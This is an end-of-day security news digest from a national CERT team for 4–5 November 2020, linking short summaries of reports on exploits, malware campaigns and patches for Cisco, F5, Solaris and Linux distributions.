End-of-Day report
Timeframe: Mittwoch 04-11-2020 18:00 - Donnerstag 05-11-2020 18:00
Handler: Dimitri Robl
Co-Handler: Stephan Richter
News
Exploit für Cisco-VPN AnyConnect in Umlauf - Sicherheitsupdate steht noch aus
Attacken auf Ciscos VPN-Lösung AnyConnect könnten kurz bevor stehen. Bislang gibt es aber nur Patches für andere Lücken in IOS XR, Webwex & Co.
https://heise.de/-4948798
Attacks on industrial enterprises using RMS and TeamViewer: new data
In summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.
https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer-new-data/99206/
Did You Spot "Invoke-Expression"?, (Thu, Nov 5th)
When a PowerShell script is obfuscated, the deobfuscation process is, most of the time, performed through the Invoke-Expression cmdlet[1]. Invoke-Expression evaluates the string passed as an argument and returns the results of the commands inside the string.
https://isc.sans.edu/diary/rss/26762
Legacy Mauthtoken Malware Continues to Redirect Mobile Users
During malware analysis, we regularly find variations of this injected script on various compromised websites: . The variable -_0x446d- assigns hex encoded strings in different positions in the array. If we get the ASCII representation of the variable, we-ll end up with the following code: [...]
https://blog.sucuri.net/2020/11/legacy-mauthtoken-malware-continues-to-redirect-mobile-users.html
BEC Scammers Exploit Flaw to Spoof Domains of Rackspace Customers
A threat actor specializing in business email compromise (BEC) attacks has been observed exploiting a vulnerability to spoof the domains of Rackspace customers as part of its operations.
https://www.securityweek.com/bec-scammers-exploit-flaw-spoof-domains-rackspace-customers
Vulnerabilities
Sicherheitsupdates: BIG-IP Appliances und die Admin-Falle
Der Netzwerkausrüster F5 hat wichtige Patches zum Absichern verschiedener Appliances veröffentlicht.
https://heise.de/-4949448
Security updates for Thursday
Security updates have been issued by Debian (bouncycastle, gdm3, and libonig), Fedora (arpwatch, thunderbird, and trousers), openSUSE (chromium, gn), Red Hat (freetype, libX11, thunderbird, and xorg-x11-server), and SUSE (ImageMagick, java-11-openjdk, salt, and wireshark).
https://lwn.net/Articles/836238/
In Wild Critical Buffer Overflow Vulnerability in Solaris Can Allow Remote Takeover - CVE-2020-14871
FireEye Mandiant has been investigating compromised Oracle Solaris machines in customer environments. During our investigations, we discovered an exploit tool on a customer-s system and analyzed it to see how it was attacking their Solaris environment. The FLARE team-s Offensive Task Force analyzed the exploit to determine how it worked, reproduced the vulnerability on different versions of Solaris, and then reported it to Oracle. In this blog post we present a description of the [...]
https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html